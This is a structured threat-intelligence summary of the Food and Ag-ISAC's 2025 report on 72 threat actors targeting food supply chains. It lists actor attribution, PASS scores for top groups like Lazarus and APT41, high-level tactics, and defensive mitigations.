Full Report
The Food and Ag-ISAC paints a stark picture of a sector facing sustained and increasingly sophisticated cyber pressure,... The post Food and Ag-ISAC finds 72 active threat actors behind persistent, sophisticated cyber attacks targeting food supply chains appeared first on Industrial Cyber.
Analysis Summary
Based on the "The 2025 Food and Agriculture Cyber Threat Report" issued by the Food and Ag-ISAC, here is the structured summary of the threat actor landscape.
*Note: Since the article provides a high-level overview of 72 actors, this summary focuses on the top-tier adversaries identified by the Predictive Adversary Scoring System (PASS).*
# Threat Actor: Food & Ag Sector Adversaries (Aggregate)
## Attribution & Identity
The Food and Ag-ISAC monitors over 330 adversaries, identifying **72 active threat actors** specifically targeting the food supply chain.
- **Russia-affiliated actors:** Account for 59.3% of observed activity.
- **China-affiliated actors:** Account for 25.4% of observed activity.
- **Top Scored Actors (PASS Score):**
- **Lazarus Group** (North Korea, Nation-State) - Score: 84
- **Moonstone Sleet** (North Korea, Nation-State) - Score: 84
- **APT41** (China, Nation-State) - Score: 79
- **Scattered Spider** (Cybercriminal) - Score: 77
- **Qilin** (Ransomware) - Score: 76
- **LockBit 5.0** (Ransomware) - Score: 76
- **Lapsus$ Hunters** (Cybercriminal) - Score: 76
- **Dark Engine** (Hacktivist) - Score: 76
- **APT18** (China, Nation-State) - Score: 75
- **Akira** (Ransomware) - Score: 73
## Activity Summary
The report details a 2024-2025 campaign period characterized by "sustained and increasingly sophisticated cyber pressure." These actors are engaged in persistent operations ranging from data extortion and ransomware to strategic espionage aimed at the "farm-to-table" supply chain.
## Tactics, Techniques & Procedures
- **Living-off-the-Land (LotL):** Use of legitimate system tools to blend in with normal network traffic.
- **Supply Chain Compromise:** Exploiting third-party vendors to gain access to primary targets.
- **Modified Malware:** Deployment of customized malicious code to evade traditional signatures.
- **Data Extortion:** Stealing sensitive data and threatening release to force payment.
- **Vulnerability Exploitation:** Rapid weaponization of sector-specific vulnerabilities.
- **MITRE ATT&CK IDs (Implied):**
- T1195 (Supply Chain Compromise)
- T1218 (System Binary Proxy Execution - LotL)
- T1486 (Data Encrypted for Impact - Ransomware)
## Targeting
- **Sectors:** Agriculture, food processing, logistics, and the broader farm-to-table supply chain.
- **Geography:** Global, with significant focus on the Nordics (Finland), the United States, and regions affected by Middle East tensions.
- **Victims:** While specific company names were redacted in the summary, the report highlights "defense contractors" and "water infrastructure" as overlapping critical sectors.
## Tools & Infrastructure
- **Malware Families:**
- Ransomware variants (Akira, LockBit 5.0, Qilin).
- Specialized tools used by Lazarus Group and Moonstone Sleet.
- **Infrastructure:**
- Command and Control (C2) servers (specific IPs/domains not listed in the text).
- Compromised remote access points.
## Implications
The strategic intent of these actors is dual-pathed:
1. **Financial Gain:** Large-scale ransomware ecosystems see the food sector as a high-value, high-pressure target where downtime is intolerable.
2. **Geopolitical Leverage:** Nation-states (Russia and China) target the sector to map dependencies, conduct industrial espionage, or prepare for disruptive "wiper" operations in the event of conflict.
## Mitigations
- **Resource Allocation:** Utilize the PASS (Predictive Adversary Scoring System) to prioritize defense against high-scoring actors like Lazarus and APT41.
- **OT/ICS Security:** Move from system-centric protection to control-centric risk management.
- **Supply Chain Hygiene:** Implement rigorous third-party risk assessments and secure remote access protocols.
- **Information Sharing:** Engage with the Food and Ag-ISAC for actionable, real-time threat intelligence.